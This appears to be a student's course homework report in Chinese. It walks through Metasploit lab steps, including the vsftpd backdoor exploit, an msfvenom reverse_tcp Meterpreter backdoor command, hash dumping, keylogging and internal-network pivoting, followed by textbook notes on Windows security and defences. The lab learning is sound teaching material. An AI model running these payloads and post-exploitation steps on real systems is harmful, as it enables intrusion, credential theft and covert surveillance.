2017-2018-2 20179302《網絡攻防》第七週做業

一. kali視頻學習

1. kaliSecurity 漏洞利用之檢索與利用

2. kaliSecurity 漏洞利用之Metasplolit基礎

首先啓動postgresql數據庫:/etc/init.d/postgresql start;或者 service postgresql start;

初始化MSF數據庫(關鍵步驟!):msfdb init;

運行msfconsole:msfconsole;

在msf中查看數據庫鏈接狀態:db_status。

在打開的msf中搜索看Metasploit的ftp服務是否有漏洞search vsftp

使用use exploit/unix/vsftpd_234_backdoor進入,而後使用show options查看參數,最後set RHOST 172.16.6.68設置遠程IP地址

選擇payload

執行攻擊測試,能夠看到,成功以後,查看id,使用whoami命令,查看IP都是可行的

3. 漏洞利用之Meterpreter介紹

生成Meterpreter後門msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.6.127 LPORT=2333 -a x86 -f exe > /root/door.exe,執行這條命令以前記得按照漏洞利用之Metasploit基礎部分啓動服務,作好準備工做,具體都在下圖中體現,其中將端口號改爲2333,是由於咱們執行msfvenom命令時的端口號爲2333

執行了msfvenom的命令後,雖然有其餘的提示,可是在以前設置的目錄中已經有了door.exe文件

設置監聽的靶機IP(192.168.200.2),而後在msf下用exploit進行監聽,在靶機上運行door.exe文件後就能夠在msf下獲得Meterpreter session

在此時,能夠用background返回exploit,用sessions -i 1就能夠再次回到Meterpreter

用help能夠查看Meterpreter的命令用法,經常使用命令sysinfo查看靶機信息,hasndump抓取hash

抓取屏幕用screenshot,能夠看到保存的路徑

還有一個鍵盤記錄的功能keyscan_start,在靶機中打開一個記事本,輸入Hello world!,而後在Meterpreter這邊用命令keyscan_dump查看返回內容,要關閉這個功能,用keyscan_stop

擴展工具:使用load -l鍵就能夠看到這些擴展功能

4. 漏洞利用之Metasploit後滲透測試

在跳板機獲取必定權限後,須要積極地向內網主機權限發展,獲取指定的目標信息,探查系統的漏洞,藉助Msf已經獲得的Meterpreter後門,可使後續操做更容易。

一、查看當前網卡、網段信息,先控制一臺跳板機,查看相關網卡網段信息

二、添加路由表run autoroute -s 10.0.0.1

三、開Socks代理 經過使用 auxiliaryver/socks4a模塊,建立一個Socks代理,能夠做爲瀏覽器,Sqlmp,Namp等使用。

四、經過background和sessions -i能夠自由切換進入Session

五、輸入run能夠看到Meterpreter上能夠作的不少命令

六、獲取內網信息run arp_scanner -r 10.0.0.1/24

七、也可上傳文件,作端口轉發後續測試

八、應用程序/權限維持/Tunnel工具集

九、端口轉發upload lcx.exe c:</code>

5. 漏洞利用之beef

二. 教材學習

本週主要學習了《網絡攻防---技術與實踐》第7章的內容,主要學習了 Windows操做系統安全攻防ios

Windows操做系統基本框架

如上圖所示,Windows操做系統分爲運行於處理器特權模式(ring 0)的操做系統內核,以及運行在處理器非特權模式(ring 3)的用戶空間代碼。採用宏內核(monolithic)模式進行架構。內核基本模塊分爲:Windows執行體 、Windows內核體 、設備驅動程序 、硬件抽象層 、Windows窗口與圖形界面內核實現代碼 、系統支持進程 、 環境子系統服務進程 、服務進程 、用戶應用條件 、核心子系統DLL 。
Windows將進程視做可執行程序運行時刻的容器,而線程是指令執行的具體載體。
Windows的虛擬內存空間分爲系統核心內存區間與用戶內存區間兩部分。
Windows早期使用FAT文件分配表格式來管理文件系統,如今使用NTFS文件系統,較以前更加安全,具備更高的性能、可靠性和資源利用率。Windows可執行文件採用PE格式。
Windows系統註冊表在做爲系統全局配置、用戶和應用軟件配置信息的存儲倉庫,在Windows系統配置和控制方面承擔着關鍵角色。可經過自帶的 regedit.exe 註冊表查找編輯工具或其餘第三方工具進行訪問與修改,可以使用 RegMon 等工具進行監控。
Windows的網絡組件模塊根據OSI網絡模型可分爲:
(1)物理層 各類網卡硬件的設備驅動程序;
(2)鏈路層 NDIS庫及miniport驅動程序;
(3)網絡層與傳輸層 TDI傳輸層,實現了TCP/IP等協議棧;
(4)會話層與表示層 網絡API DLL 及 TDI 客戶端;
(5)應用層 網絡應用程序與服務進程。sql

Windows操做系統的安全體系結構

Windows操做系統是基於引用監控器模型來實現基本的對象安全模型。最爲核心的是位於內核中的SRM(Security Reference Monitor)安全引用監控器及位於用戶態的LSASS(Local Security Authority Subsystem Service)安全服務,它們與Winlogon/Netlogon及Eventlog等服務一塊兒,實現了對主體用戶的身份認證機制、對全部的資源對象的訪問控制機制,以及對訪問的安全審計機制。數據庫

Windows身份認證機制

Windows操做系統中以安全主體概念來包含全部進行系統資源訪問請求的實體對象,有用戶、用戶組和計算機。
Windows爲每一個用戶和計算機設置帳戶(accounts)進行管理,做爲這些安全主題運行程序的執行環境,帳戶權限的根本做用就是限制這些帳戶內運行程序對系統資源對象的訪問。用戶組是爲了簡化用戶管理而引入的用戶帳戶容器,經過將用戶帳戶添加入特定的用戶組,使得該用戶擁有用戶組配置的所有權限,有效地使用用戶組,科室的系統管理員對權限控制的配置工做量大大減小。
Windows用戶帳戶的口令字經加密被保存於SAM或活動目錄AD中。在Windows運行期間,內核對SAM文件加了一個持久性的文件鎖,故即便是Administrator帳戶,經過正常路徑也沒法獲取,只有LocalSystem帳戶權限才能夠讀取,但如今有許多黑客工具也能夠在內存中直接dump出SAM的內容。
Windows支持本地身份認證和網絡身份認證兩種方式。Winlogin進程、GINA圖形化登陸窗口與LSASS服務經過協做來完成本地身份認證過程。windows

Windows受權與訪問控制機制

Windows受權與訪問控制機制是基於引用監控器模型,由內核中的SRM模塊與用戶態的LSASS服務共同實施,由SRM做爲安全主體訪問對象資源時的中介,根據設定的訪問控制列表進行受權訪問。在用戶等安全主體通過認證後,Windows系統會賦予用戶一個訪問令牌。Windows對於系統中全部需保護的資源都抽象成對象。瀏覽器

Windows安全審計機制

系統審計策略在本地安全策略中由系統管理員來定義,來肯定系統對哪些事件進行記錄。安全

Windows的其餘安全機制

以上的身份認證、受權與訪問控制及安全審計是三個基本安全功能特性,其餘的還包括Windows安全中心、IPsec加密與驗證機制等。服務器

Windows系統的安全漏洞生命週期

主要分爲漏洞的發現、利用與修補過程。在安全漏洞當中,對攻擊者最具價值的是遠程 滲透攻擊可利用、後果爲遠程執行代碼的高危型漏洞,或本地滲透攻擊可利用、後果爲本地特權提高的高危型漏洞,這兩者相結合能夠形成嚴重的安全問題。各大廠商在針對安全漏洞,也會做出相應的補丁修復。有許多安全漏洞公開披露信息庫,如:CVE、NVD、SecurityFocus、OSVDB等以供查詢參考。這對一個特定主機,典型滲透攻擊過程包括漏洞掃描測試、查找針對發現漏洞的滲透代碼、實施滲透測試。典型工具是 Metasploit工具,在後面實踐當中會詳細介紹。網絡

Windows遠程口令猜想與破解攻擊

Windows經過基於服務器消息塊SMB協議承載的文件與打印機共享服務來爲網絡用戶提供遠程訪問文件系統和打印機的支持,於是它也就成爲攻擊者實施Windows遠程口令字猜想的傳統攻擊渠道。還有一種實施遠程口令字攻擊的經典技術是竊聽網絡上的口令字交換通訊實施破解。Windows的在不一樣版本在進行網絡身份認證時,使用了LanMan、##NTLM和Kerberos三種認證協議。##
這對這些攻擊,最根本的防護措施仍是使用高安全強度口令,儘可能關閉沒必要要的易受遠程口令猜想攻擊網絡服務,配置主機防火牆來限制對端口服務,利用網絡防火牆限制這些服務的訪問,禁用過期且存在本質缺陷的LanMan與NTLM,僅使用通過安全加固NTLMv2與Kerberos認證協議,對於安全級別較高的Windows系統服務器等主機,管理員能夠制定和實施強口令字策略及設定帳戶鎖定閾值。session

Windows網絡服務遠程滲透攻擊

主要針對Windows系統默認開放的諸如135(TCP)、137(UDP)等端口進行滲透,針對NetBios網絡服務、SMB網絡服務、MSRPC網絡服務進行攻擊,還有針對微軟網絡服務及第三方網絡服務進行遠程攻擊。防範措施包括:從軟件設計根源上儘量減小漏洞出現,管理員儘量快的更新與應用軟件安全補丁,在「零日」漏洞時間管理員應做出相應的防範,利用服務廠商及社區中的安全覈對清單對服務進行配置並利用一些安全加強插件來加固所部署的網絡服務,經過漏洞掃描軟件來標識網絡中已經存在的安全漏洞並及時修補,啓用入侵檢測機制,創建有效的事件應急相應計劃。架構

Window本地安全攻防技術

利用以前的技術得到Windows系統的訪問權後,接下來的攻擊主要包括本地特權提高、敏感信息竊取、消蹤滅跡、遠程控制與後門程序。提權主要利用DLL注入和破解本地程序安全漏洞實現,工具備GetAdmin及Metasploit。敏感信息獲取主要包括系統口令字密文提取、系統口令字破解及用戶敏感數據竊取。消蹤滅跡主要包括關閉審計功能和清理事件日誌。遠程控制與後門程序可經過各類現成的黑客工具利用命令行或是圖形化界面實現。可針對各個不一樣的攻擊手段採起相應的防範措施。

相關文章
相關標籤/搜索